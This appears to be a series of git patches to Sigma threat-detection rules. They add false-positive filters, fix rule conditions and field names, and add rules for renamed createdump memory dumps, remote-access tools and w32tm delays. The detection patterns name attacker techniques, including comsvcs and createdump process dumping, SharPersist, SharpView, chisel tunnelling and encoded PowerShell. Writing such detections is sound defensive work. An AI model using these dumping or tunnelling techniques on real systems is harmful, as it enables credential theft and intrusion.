2019/10/25 -modified: 2022/08/09 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -45,6 +45,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder' + filter_realvnc: + Image: 'C:\Windows\System32\spoolsv.exe' + TargetObject|endswith: '\Print\Monitors\MONVNC\Driver' + Details: 'VNCpm.dll' condition: all of system_control_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index ad5a53caa..500836df0 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/09/06 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -103,8 +103,10 @@ detection: - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\' Details|contains: '\AppData\Local\Microsoft\OneDrive\' filter_python: - TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}' - Details|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' + TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\{' + Details|contains|all: + - '\AppData\Local\Package Cache\{' + - '}\python-' Details|endswith: '.exe" /burn.runonce' filter_officeclicktorun: Image|startswith: @@ -125,6 +127,12 @@ detection: - '"C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui' - '"C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe" /gui' - '{472083B0-C522-11CF-8763-00608CC02F24}' + filter_aurora_dashbaord: + Image|endswith: + - '\aurora-agent-64.exe' + - '\aurora-agent.exe' + TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Run\aurora-dashboard' + Details: 'C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe' condition: all of current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 0fe1f398d..31626072c 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/08/05 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -72,6 +72,9 @@ detection: Image|endswith: '\OfficeClickToRun.exe' filter_ms_win_desktop_runtime: Details|startswith: '"C:\ProgramData\Package Cache\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\windowsdesktop-runtime-' + filter_vcredist: + Image|endswith: '\VC_redist.x64.exe' + Details|endswith: '}\VC_redist.x64.exe" /burn.runonce' condition: all of wow_current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml index 753f0d395..dce4cc2a3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml @@ -7,7 +7,7 @@ references: - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2022/09/02 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -79,6 +79,11 @@ detection: filter_sec_health_svc: Image: 'C:\Windows\system32\SecurityHealthService.exe' Details|contains: 'C:\Windows\System32\SecurityHealth' + filter_inprocserver: + Image: + - 'C:\Windows\System32\poqexec.exe' + - 'C:\Windows\System32\regsvr32.exe' + TargetObject|endswith: '\InProcServer32\(Default)' condition: selection and not 1 of filter* falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml index 474ba773b..5ce063496 100644 --- a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml @@ -3,7 +3,7 @@ id: 612e47e9-8a59-43a6-b404-f48683f45bd6 description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. author: frack113 date: 2022/02/04 -modified: 2022/08/10 +modified: 2022/09/20 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time @@ -22,6 +22,8 @@ detection: Image: 'C:\Windows\system32\lsass.exe' TargetObject|endswith: '\CurrentControlSet\Services\NTDS\Parameters\ServiceDll' Details: '%%systemroot%%\system32\ntdsa.dll' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' condition: selection and not 1 of filter* falsepositives: - Administrative scripts diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 85eb02878..3af8eef6b 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml @@ -3,6 +3,7 @@ id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 description: Detects when an attacker register a new SIP provider for persistence and defense evasion author: Nasreddine Bencherchali date: 2022/07/21 +modified: 2022/09/21 status: experimental references: - https://persistence-info.github.io/Data/codesigning.html @@ -28,7 +29,11 @@ detection: # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll - condition: all of selection_* and not filter + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|contains: '\CryptSIPDll' + Details: 'C:\Windows\System32\PsfSip.dll' + condition: all of selection_* and not 1 of filter* falsepositives: - Legitimate SIP being registered by the OS or different software. level: medium diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 0f3f90a4a..691ef5e8c 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml @@ -6,19 +6,23 @@ author: Florian Roth references: - https://twitter.com/SBousseaden/status/1410545674773467140 date: 2020/07/01 -modified: 2022/03/26 +modified: 2022/09/21 logsource: category: registry_set product: windows detection: selection: - EventType: SetValue + EventType: SetValue TargetObject|contains|all: - '\Control\Print\Environments\Windows x64\Drivers' - '\Manufacturer' Details: '(Empty)' filter_cutepdf: TargetObject|contains: '\CutePDF Writer v4.0\' + filter_vnc: + TargetObject|contains: + - '\VNC Printer (PS)\' + - '\VNC Printer (UD)\' condition: selection and not 1 of filter_* falsepositives: - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index ff88c034d..245de30dc 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -19,6 +19,6 @@ detection: condition: selection falsepositives: - Legitimate administrative action -level: medium +level: medium tags: - attack.defense_evasion From 54add1516734413698adb62171258065458f38f3 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:33 +0200 Subject: [PATCH 086/120] workflow: fix wrong filename --- .github/workflows/sigma-test.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index 60b6cdc96..5cf624347 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -138,10 +138,10 @@ jobs: - uses: actions/checkout@v2 - name: Download evtx-sigma-checker run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker - - name: Download and extract Windows 2022 0 20348 Azure baseline + - name: Download and extract Windows 2022.0.20348 Azure baseline run: | wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz - tar xzf win2022-0-20348.tgz + tar xzf win2022-0-20348-azure.tgz - name: Remove deprecated rules run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' - name: Check for Sigma matches in baseline From f940a43d8f0ef72ee9e4c1b73291a7481f6ae9b1 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:12:30 +0200 Subject: [PATCH 087/120] workflow: use correct rule title --- .github/workflows/known-FPs.csv | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index a22dafcd5..5b36cab65 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -38,4 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe -949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon From cc5cda0a22fea3d89550c013ee7533c562465268 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 14:10:50 +0200 Subject: [PATCH 088/120] fix: needs to be contains now --- .../registry_delete_removal_com_hijacking_registry_key.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 71184d34b..3e97012a9 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -43,7 +43,7 @@ detection: filter_peazip: Image|contains: 'peazip' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) - TargetObject|startswith: '\PeaZip.' + TargetObject|contains: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown From 8e011540b0b4829266f2c98fbf9f7ad1a40c0c83 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 16:30:47 +0200 Subject: [PATCH 089/120] rule: createdump renamed --- ...c_creation_win_cmstp_com_object_access.yml | 4 +-- ...c_creation_win_susp_renamed_createdump.yml | 30 +++++++++++++++++++ 2 files changed, 32 insertions(+), 2 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index 36718bfa0..49f39268f 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml @@ -25,8 +25,8 @@ detection: selection: ParentImage|endswith: '\DllHost.exe' IntegrityLevel: - - 'High' - - 'System' + - 'High' + - 'System' ParentCommandLine|contains: - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml new file mode 100644 index 000000000..160414c51 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml @@ -0,0 +1,30 @@ +title: Renamed CreateDump Process Dump +id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory +status: experimental +references: + - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ + - https://twitter.com/bopin2020/status/1366400799199272960 +author: Florian Roth +date: 2022/09/20 +tags: + - attack.defense_evasion + - attack.t1036 + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'FX_VER_INTERNALNAME_STR' + selection_cli: + CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - '.dmp ' + filter: + Image|endswith: '\createdump.exe' + condition: 1 of selection* and not filter +falsepositives: + - Command lines that use the same flags +level: high From 61a4a48ac001424161cd6dd630c93f04ced77c73 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:02:42 +0200 Subject: [PATCH 090/120] fix: CommandLine field types --- .../proc_creation_win_process_dump_rundll32_comsvcs.yml | 2 +- .../process_creation/proc_creation_win_susp_sharpview.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml index 4143a47ad..f8a26ecc7 100644 --- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml +++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml @@ -33,7 +33,7 @@ detection: CommandLine|contains|all: - 'comsvcs' - 'full' - Commandline|contains: + CommandLine|contains: - '24 ' - '#24' - '#+24' diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..031873c26 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -15,7 +15,7 @@ detection: sharpview: OriginalFileName: SharpView.exe sharpview_methods: - Commandline|contains: + CommandLine|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping From 026844026f0ba7c22c4753f025921975d5d77aca Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:04:18 +0200 Subject: [PATCH 091/120] fix: condition in sharpersist rule --- .../process_creation/proc_creation_win_hack_sharpersist.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml index 02c36329a..06ed87af5 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -36,7 +36,7 @@ detection: CommandLine|contains|all: - ' -t schtask -c ' - ' -m add' - condition: selection + condition: 1 of selection* falsepositives: - Unknown level: high From 2ffca9c8da4bb8ca78002ed4af69165677f09614 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:08:24 +0200 Subject: [PATCH 092/120] fix: condition --- .../process_creation/proc_creation_win_sharp_chisel_usage.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml index 7d472e237..adce54a59 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -33,7 +33,7 @@ detection: # - ' --reverse' # - ' r:' # - ':127.0.0.1:' - condition: 1 of selection + condition: 1 of selection* falsepositives: - Some false positives may occure with other tools with similar commandlines level: high From eeca6a898b641c25af40cbcef1f8aaaf9ff3dabe Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:16:02 +0200 Subject: [PATCH 093/120] fix: mitre attack tags --- .../process_creation/proc_creation_win_hack_sharpersist.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml index 06ed87af5..51ca980d6 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -13,8 +13,6 @@ logsource: tags: - attack.persistence - attack.t1053 - - attack.t1060 - - attack.t1050 detection: selection1: Image|endswith: '\SharPersist.exe' From 6c70c6d35a695229c80ef418cff3c57ea21f13c9 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 22 Sep 2022 17:42:27 +0200 Subject: [PATCH 094/120] Update win_impacket_psexec.yml --- rules/windows/builtin/security/win_impacket_psexec.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index ff7856880..434d38015 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -6,7 +6,7 @@ author: Bhabesh Raj references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html date: 2020/12/14 -modified: 2022/08/11 +modified: 2022/09/22 logsource: product: windows service: security From 24e87d0f341e43b69a0258a12dd22f19d7740f35 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 22 Sep 2022 17:42:54 +0100 Subject: [PATCH 095/120] fix: Rename Linux process creation rule to use established pattern One rule had filename beginning 'prox' rather than 'proc'. Signed-off-by: Rachel Rice --- ...removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/process_creation/{prox_creation_lnx_chattr_immutable_removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} (100%) diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml similarity index 100% rename from rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml rename to rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml From 6497cb7745c44b523cfc367f1b533201b3ec422f Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Fri, 23 Sep 2022 03:37:00 +0900 Subject: [PATCH 096/120] Keep at level: low --- .../builtin/application/win_builtin_remove_application.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 1a497e2b6..0106730e8 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: informational +level: low tags: - attack.impact - attack.t1489 From ac9b12b6bb973bf9c2b2a72bfec3590c64692e6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 23 Sep 2022 07:14:31 +0200 Subject: [PATCH 097/120] Update win_builtin_remove_application.yml --- .../builtin/application/win_builtin_remove_application.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 0106730e8..e9e4cc9d5 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,6 +17,7 @@ detection: condition: selection falsepositives: - Unknown +#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low tags: - attack.impact From 9b0189b5f7ea0004614cbb3a80674bab5199a538 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 25 Sep 2022 16:14:21 +0200 Subject: [PATCH 098/120] Add redcannary rules --- .../proc_creation_win_netsupport.yml | 27 +++++++++++++++++ .../proc_creation_win_ultraviewer.yml | 26 ++++++++++++++++ .../proc_creation_win_w32tm.yml | 30 +++++++++++++++++++ 3 files changed, 83 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_netsupport.yml create mode 100644 rules/windows/process_creation/proc_creation_win_ultraviewer.yml create mode 100644 rules/windows/process_creation/proc_creation_win_w32tm.yml diff --git a/rules/windows/process_creation/proc_creation_win_netsupport.yml b/rules/windows/process_creation/proc_creation_win_netsupport.yml new file mode 100644 index 000000000..d9d99094f --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_netsupport.yml @@ -0,0 +1,27 @@ +title: Use of NetSupport Remote Access Software +id: 758ff488-18d5-4cbe-8ec4-02b6285a434f +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Description: NetSupport Client Configurator + - Product: NetSupport Remote Control + - Company: NetSupport Ltd + - OriginalFileName: PCICFGUI.EXE + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 diff --git a/rules/windows/process_creation/proc_creation_win_ultraviewer.yml b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml new file mode 100644 index 000000000..f3781c979 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml @@ -0,0 +1,26 @@ +title: Use of UltraViewer Remote Access Software +id: 88656cec-6c3b-487c-82c0-f73ebb805503 +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Product: UltraViewer + - Company: DucFabulous Co,ltd + - OriginalFileName: UltraViewer_Desktop.exe + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml new file mode 100644 index 000000000..82bcbcc13 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml @@ -0,0 +1,30 @@ +title: Use of W32tm as Timer +id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 +status: experimental +description: When configured with suitable command line arguments,w32tm can act as a delay mechanism +references: + - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md + - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection_w32tm: + - Image|endswith: '\w32tm.exe' + - OriginalFileName: 'w32time.dll' + selection_cmd: + CommandLine|contains|all: + - '/stripchart' + - '/computer:' + - '/period:' + - '/dataonly' + - '/samples:' + condition: all of selection_* +falsepositives: + - Legitimate use +level: medium +tags: + - attack.discovery + - attack.t1124 From e1375467c59a5085d1505b4aa4f528a5c3468e6a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 26 Sep 2022 23:52:48 +0200 Subject: [PATCH 099/120] fix: FPs with Azure hosts --- .../powershell_script/posh_ps_send_mailmessage.yml | 10 ++++++---- .../powershell_script/posh_ps_web_request.yml | 4 +++- .../proc_creation_win_susp_powershell_cmd_patterns.yml | 8 ++++++-- .../proc_creation_win_susp_powershell_encode.yml | 8 ++++++-- 4 files changed, 21 insertions(+), 9 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml index f450b9dee..d7f20b484 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml @@ -9,15 +9,17 @@ references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2 - https://www.ietf.org/rfc/rfc2821.txt author: frack113 -date: 2022/01/07 +date: 2022/09/26 logsource: product: windows category: ps_script definition: Script block logging must be enabled detection: - selection_cmdlet: - ScriptBlockText|contains: Send-MailMessage - condition: selection_cmdlet + selection: + ScriptBlockText|contains: 'Send-MailMessage' + filter: + ScriptBlockText|contains: 'CmdletsToExport' + condition: selection and not filter falsepositives: - Legitimate script level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml index e344a07ee..6ead22b8a 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml @@ -10,7 +10,7 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2021/10/16 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 @@ -27,6 +27,8 @@ detection: - 'curl ' - 'Net.WebClient' - 'Start-BitsTransfer' + filter: + Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: selection falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml index 115d72cea..d1a4a1c0e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml @@ -6,7 +6,7 @@ author: Florian Roth references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ date: 2022/05/24 -modified: 2022/07/14 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,11 @@ detection: - ' IAB' - ' PAA' - ' aQBlAHgA' - condition: encoded and selection + filter: + ParentImage|contains: + - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + - '\gc_worker.exe' + condition: encoded and selection and not filter falsepositives: - Other tools that work with encoded scripts in the command line instead of script files level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml index f6ab8837d..42a2a1995 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml @@ -8,7 +8,7 @@ references: - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/ date: 2022/01/02 -modified: 2022/07/14 +modified: 2022/09/26 logsource: category: process_creation product: windows @@ -25,7 +25,11 @@ detection: - ' -ec ' filter: CommandLine|contains: ' -Encoding ' - condition: selection and not filter + filter_azure: + ParentImage|contains: + - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + - '\gc_worker.exe' + condition: selection and not 1 of filter* falsepositives: - Unknown level: medium From 0503e2b8f7da878c145a6f7cf6dafd8b02c5bd99 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:17:53 +0200 Subject: [PATCH 100/120] fix: FPs on Azure --- .../image_load_side_load_from_non_system_location.yml | 8 +++++--- .../proc_creation_win_malware_emotet.yml | 9 +++++++-- .../proc_creation_win_susp_system_user_anomaly.yml | 4 +++- 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..37c942bac 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -8,7 +8,7 @@ references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # 